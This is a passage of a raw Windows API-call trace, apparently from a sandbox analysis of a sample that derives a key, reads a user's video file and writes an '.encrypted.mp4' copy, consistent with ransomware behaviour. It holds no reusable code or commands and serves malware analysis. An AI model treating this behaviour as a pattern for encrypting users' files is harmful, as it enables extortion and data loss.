(in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0043.742] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.743] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.743] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0043.743] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.743] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.743] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.743] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.743] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.743] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.743] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0043.743] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.743] CryptDestroyHash (hHash=0x7c2100) returned 1 [0043.743] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.743] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.743] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.743] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.743] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.743] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ooaw\\u373x4nowfcnj.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0043.744] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.744] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0043.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0043.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0043.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0043.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0043.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0043.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0043.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0043.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0043.744] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0043.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0043.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0043.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0043.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0043.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0043.744] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0043.744] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0043.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0043.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0043.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0043.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0043.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0043.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0043.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0043.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0043.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0043.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0043.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0043.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0043.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0043.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0043.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0043.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0043.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0043.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0043.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0043.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0043.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0043.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0043.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0043.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5810 [0043.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0043.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0043.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0043.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0043.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5810 | out: hHeap=0x770000) returned 1 [0043.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0043.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0043.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0043.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0043.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0043.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0043.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0043.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0043.746] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ooaw")) returned 0x10 [0043.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0043.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0043.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0043.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0043.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0043.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0043.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0043.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0043.746] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.encrypted.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ooaw\\u373x4nowfcnj.encrypted.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0043.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0043.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0043.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0043.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0043.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0043.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0043.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0043.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0043.747] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0043.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0043.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0043.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0043.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0043.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0043.747] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0043.747] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0043.747] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0043.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0043.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0043.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0043.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0043.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0043.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0043.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0043.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0043.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0043.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0043.748] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0043.748] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0043.751] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x2854, lpOverlapped=0x0) returned 1 [0043.752] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0043.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0043.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0043.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x12854) returned 0xac2018 [0043.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0043.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0043.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0043.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0043.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0043.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0043.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x12854) returned 0x935008 [0043.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0043.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.755] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0043.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0043.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0043.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0043.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x12854) returned 0xac2018 [0043.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0043.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0043.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0043.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.755] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0043.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0043.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0043.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0043.756] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0043.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0043.756] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0043.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0043.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1b8 [0043.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0043.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0043.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0043.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0043.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x12854) returned 0xac2018 [0043.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1c8 [0043.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0043.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0043.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0043.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1a8 [0043.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0043.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0043.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0043.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2e8 [0043.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0043.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0043.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0043.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cf10 [0043.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0043.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0043.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0043.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0043.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0043.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x12854) returned 0x947868 [0043.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0043.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0043.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0043.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0043.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0043.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0043.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0043.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0043.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0043.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0043.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0043.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0043.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0043.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0043.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0043.758] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0043.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0043.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0043.758] 